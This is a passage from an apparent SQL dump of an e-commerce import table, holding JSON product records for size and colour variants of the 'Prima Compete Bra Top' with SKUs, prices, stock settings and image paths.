ty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1596\":{\"sku\":\"WB04-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-M-Blue\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1597\":{\"sku\":\"WB04-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-M-Purple\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1598\":{\"sku\":\"WB04-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-M-Yellow\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1599\":{\"sku\":\"WB04-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-L-Blue\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(17, 'catalog_product', 'append', '{\"1600\":{\"sku\":\"WB04-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-L-Purple\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1601\":{\"sku\":\"WB04-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-L-Yellow\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1602\":{\"sku\":\"WB04-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-XL-Blue\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1603\":{\"sku\":\"WB04-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-XL-Purple\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1604\":{\"sku\":\"WB04-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-XL-Yellow\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\"